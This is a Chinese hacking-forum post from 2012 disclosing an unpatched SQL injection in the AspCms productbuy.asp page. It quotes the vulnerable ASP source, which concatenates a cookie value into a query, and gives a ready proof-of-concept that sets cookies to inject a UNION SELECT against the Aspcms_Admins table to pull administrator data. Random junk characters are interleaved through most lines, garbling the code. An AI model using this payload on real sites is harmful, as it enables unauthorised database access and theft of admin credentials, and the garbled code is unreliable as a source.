好久没上土司了,上来一看发现在删号名单内.....* i- ?# w; w3 u6 u8 ^
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。# Y2 \: t" ]- j4 A% o
废话不多说,看代码:1 ^3 l2 a3 U% ^. T/ H* F
& v h2 H. `- Y0 s) T<%4 e; M' H- A! B9 ^ W+ a$ ?& q
0 N0 E/ r6 y3 _2 I, ]- uif action = "buy" then( v) g' C/ h" o* N- G
) j9 I4 U5 y$ q: b. r! H3 @! N8 k addOrder()
, x8 k* \! E: Z. x# @, V
. A3 h: U8 M: _1 _6 J3 Oelse
* S4 m1 v0 Y- Q" L7 u. i
9 I: }4 t% r$ Y$ @! X" U8 G echoContent()
5 j+ ^; m) W4 f% u6 c5 d0 C f5 ~6 v
end if9 }5 Z; _$ h$ @* b, b
5 m& B3 D5 }0 O6 O) e
: \* |, L n9 H3 P& q2 o
. q# t: e* P3 y# i6 I, }$ @! f5 F4 R
……略过
2 @* l# E) m/ W8 I$ U0 ]" e6 m* r/ {7 i& S
- G) M5 c( C2 m- T' ^) u+ z: k8 ]' U, i/ S+ z" Z2 b
Sub echoContent()
: @. n1 Z! Z) ~) {% Y: y
5 o; Y; p+ q/ K C) @ dim id
; i" i' e; w4 v$ W% E- N: o2 U) v* u. A' d3 w8 a
id=getForm("id","get")8 j3 |/ J$ b( B+ y9 w# p& B, H
* f1 l/ H/ `7 [. A- }* M5 Z
2 Z/ l5 T# p2 V; e
8 N3 g) [2 ] }! \: z
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 9 k% ?. i: Q( W! R
; B6 y0 T# z P& X$ D: u
1 ]3 H6 ?* B2 |$ d1 j: r
5 U8 \' D5 {# D/ O5 e5 t dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
% L# x7 H9 w6 M. [
1 P1 L* X3 N" R0 J' z dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct* |% {- A& `0 I& X' r
. P# T. S' z4 c! [7 C Dim templatePath,tempStr
+ A' _5 y* R7 p5 I/ R
5 y+ T7 M$ c3 I; c, } templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"9 q& V. y$ c) P! B7 e5 ~. Y: O4 r6 g
5 P# U3 b U* O4 ?4 x$ g3 ~1 \
3 N( h2 h3 `& R9 F+ h' x9 e
5 c$ w0 d& R% m4 e8 U set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")8 W3 m% c1 k* g" B
: l2 s" R) h9 c) `/ r selectproduct=rsObj(0)# L3 C% X4 O l& O
3 d9 O( h5 N- ?; Y" Q: G
8 W' X! h! Q0 _# D# p; }/ D# P# T( N* h2 _' j3 z0 }" X
Dim linkman,gender,phone,mobile,email,qq,address,postcode4 b8 _) @9 ]. A2 m8 a2 y$ g( l
# i1 N& [# \0 I6 I$ B2 ~5 W
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
4 ]2 G. @0 O; n% |( q' Y
0 S5 V$ f. |) V; @) ?9 k if rCookie("loginstatus")=1 then ) i3 H4 u% A- ?( `2 O9 }
% }0 u+ t$ k" V' A3 s2 y- s) k- b set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
5 {4 m/ h4 `; S: i, O! z' P4 @& Q+ ~4 c
linkman=rsObj("truename")
) k# H% m0 S( F* s4 e( ~
7 y: {" ?+ K9 [$ b- T) n, w gender=rsObj("gender"), I8 E' k3 O7 T; m, M
! L7 u' n5 S. {8 t9 m phone=rsObj("phone"). j, y$ ]2 N5 q% X* G5 O
( C4 u7 q2 R* E ~! ` mobile=rsObj("mobile")( a4 T% u5 i, H2 i2 G
J9 w* U: J! o8 F9 M5 R3 D( f
email=rsObj("email")- X+ K$ D- ]- b) w6 p5 z
. k7 z, M t/ f& X& \) W
qq=rsObj("qq")2 [/ z8 ?3 X* K
0 Q4 U% B0 M& [4 ]6 U8 s6 V# i7 Q2 L* B
address=rsObj("address")
# ~+ r/ a8 C1 c# k' u" D
& ^1 Q# C/ u& [6 S/ N' p postcode=rsObj("postcode")
( c, A O9 y* B( g% g
8 P6 }3 q/ e$ G; `3 ^) m: c! F' ? else 5 ~- Y9 W: ?! z4 W" A
' t9 i/ } w- J# M
gender=1
% o) k% w2 u* W. j9 S+ z6 g+ J( j4 N4 E1 f* }
end if- E7 @9 O8 s) T0 I( P- }
( }8 [! D" H- s! Z rsObj.close()
) n: p X3 z" j% N
2 e- [) n' {. v G6 s 6 @6 g: A- K+ J! q: I
* v( l$ ?9 Y+ K. ?" f( a with templateObj
! ?0 \: D( b, D; h" e- z3 t |
; r+ ~* i L/ k .content=loadFile(templatePath)
! Z3 E' V1 P3 Y# d5 g! L; m4 U4 W, W
# Y* R1 D$ O' v. ?) {) ?1 q4 L1 ? .parseHtml()) A; l, J9 Z2 n& R7 H' }/ B
1 Z& F4 Y$ l2 i3 ]4 E
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
1 x4 t. K; X1 m, P0 P x$ F6 f' }* _. g/ X/ _8 \/ l7 M2 K' _
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ! n' O! A4 r' H9 m& Y% k
1 p; p. R2 a; C& j Q. {" M
.content=replaceStr(.content,"[aspcms:gender]",gender)
6 [6 U! f! [, Z. P( w; C* U* m% _# s+ |8 t$ K& ~
.content=replaceStr(.content,"[aspcms:phone]",phone) : d4 z/ D+ R" X F. V% s
: t% R6 _- U8 o* S( Q ?9 K# g$ u
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
7 D9 i0 H' P* Q- U* g8 j& ^8 `; Z1 r
.content=replaceStr(.content,"[aspcms:email]",email) # ^0 W5 _- g3 w, j
8 }( o* q2 |/ i* C' x7 f9 a .content=replaceStr(.content,"[aspcms:qq]",qq) $ V( d2 c6 y6 H
7 f9 D3 m0 K" Z .content=replaceStr(.content,"[aspcms:address]",address) / C; g) R' B8 A0 A" ]" T8 q+ a
$ E% G9 l' S$ B- r .content=replaceStr(.content,"[aspcms:postcode]",postcode) 5 W3 {/ G9 \( B" `: E4 ]2 X
9 v' L0 }8 X) ^' ?) {8 |2 D% U .parseCommon()
. M3 I1 ]; K& H5 m, @6 G* D6 m4 ^9 c# c. V, C- y- Q# Y' Z
echo .content 6 Z5 L/ Z' S$ f8 _; C7 M
U& _: J1 U0 x7 }7 L7 K6 P end with
- H5 _. \% N0 f& N% o5 k, D! n( m2 X8 ^5 ]& B4 g/ B
set templateobj =nothing : terminateAllObjects
+ h9 x8 K- A6 L, {) J* B2 Z6 R! z& S8 `* `
End Sub. {: T: d- p& S
漏洞很明显,没啥好说的8 \# c. w2 @" G! c
poc:
8 T. ?. a5 I( V
* S( V8 N& ~( i! a7 @javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
1 g3 h) k9 a D- Y, y, s) P# P) @0 C+ H6 \: V4 X' E t
|
发表于 2012-12-27 08:35:05
收藏
支持
反对